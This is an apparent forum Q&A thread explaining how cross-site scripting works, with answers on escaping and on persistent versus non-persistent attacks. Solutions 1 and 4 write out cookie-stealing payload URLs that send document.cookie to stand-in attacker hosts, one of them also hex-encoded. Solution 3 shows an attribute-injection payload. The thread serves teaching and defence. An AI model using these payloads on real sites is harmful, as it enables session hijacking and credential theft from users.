How does XSS work?

Solution 1:

Cross Site Scripting basically is a security vulnerability of dynamic web pages where an attacker can create a malicious link to inject unwanted executable JavaScript into a Web site. The most usual case of this vulnerabilities occurs when GET variables are printed or echoed without filtering or checking their content.

When a victim clicks the link, the malicious code can then send the victim’s cookie away to another server, or it can modify the affected site, injecting forms, to steal usernames and passwords, and other phishing techniques.

Example of malicious link:

http://VulnerableHost/a.php?variable=<script>document.location='http://AttackersHost/cgi-bin/cookie.cgi%3Fdata='+document.cookie</script>

It's also common to encode the malicious code, for example in hex:

http://VulnerableHost/a.php?variable=%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%41%74%74%61%63%6B%65%72%73%48%6F%73%74%2F%63%67%69%2D%62%69%6E%2F%63%6F%6F%6B%69%65%2E%63%67%69%3F%20%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E

Solution 2:

An XSS vulnerability exists whenever a string from outside your application can be interpreted as code.

For example, if you're generating HTML by doing this:

<BODY>
  <?= $myQueryParameter ?>
</BODY>

then if the $myQueryParameter variable contains a <SCRIPT> tag then it will end up executing code.

To prevent an input from being executed as code, you need to escape content properly.

The above problem can be solved by realizing that the $myQueryParameter variable contains plain text, but you can't just go and put plain text into HTML and expect it to work.

So you need to convert plain text to HTML so you can put it into your HTML page. That process of converting a string in one language to another so that it can be embedded is escaping.

You can escape plain text to HTML with a function like:

function escapePlainTextToHTML(plainText) {
  return plainText.replace(/\0/g, '')
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;')
      .replace(/"/g, '&#34;')
      .replace(/'/g, '&#39;');
}

Solution 3:

In Simple English

XSS is when you insert scripts (meaning JavaScript code) into webpages, so that the browser executes the code. This is malicious, because it can be used to steal cookies, and any other data on the page. For example:

The HTML of a search box: <input value="*search value here*">

Now if you insert " onmouseover="alert(1), the final HTML would be <input value="" onmouseover="alert(1)"> When the mouse is passed over the search box, the "alert" will be executed.

In "WikiText"

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.

Solution 4:

In simple english XSS is a security vulnerabilty in which attacker can frame a malicious script to compromise the website. Now How it works?

As we know that XSS needs an input field or we can say that the GET variable through which the input is echo back to the user without filteration and sometimes filteration. After request, it is acceptable ("source code") by the browser as a response to show the contents to the user. Remember what ever you had written in the input field it will be on the source code response.So you should check it because sometimes web developer make restriction on the alert box .

If you are an attacker first you need to know the xss vulnerability by using the script tag.

For example:- alert("test")

Here alert() is used to make the popup box with the ok button and what ever you have written in the bracket it will be popup on the screen. And script tags are invisible.

Now attacker can make a malicious script to steal the cookie, steal the credentials etc.

For example:- hxxp://www.VulnerableSite.com/index.php?search=location.href = ‘http://www.Yoursite.com/Stealer.php?cookie=’+document.cookie;

Here your site is the attacker site at which the attacker can redirect the victim's cookie on his own's site with the help of document.cookie.

Thats it.

Here script tag invisible

Solution 5:

I've written up an article on what XSS is and how to address it somewhat as a PHP developer. There are also examples of what both types of XSS attacks look like (persistent vs. non-persistent).

There are two types of XSS attacks:

  1. Non-persistent: This would be a specially crafted URL that embeds a script as one of the parameters to the target page. The nasty URL can be sent out in an email with the intent of tricking the recipient into clicking it. The target page mishandles the parameter and unintentionally sends code to the client's machine that was passed in originally through the URL string.
  2. Persistent: This attack uses a page on a site that saves form data to the database without handling the input data properly. A malicious user can embed a nasty script as part of a typical data field (like Last Name) that is run on the client's web browser unknowingly. Normally the nasty script would be stored to the database and re-run on every client's visit to the infected page.

See more here: http://www.thedablog.com/what-is-xss/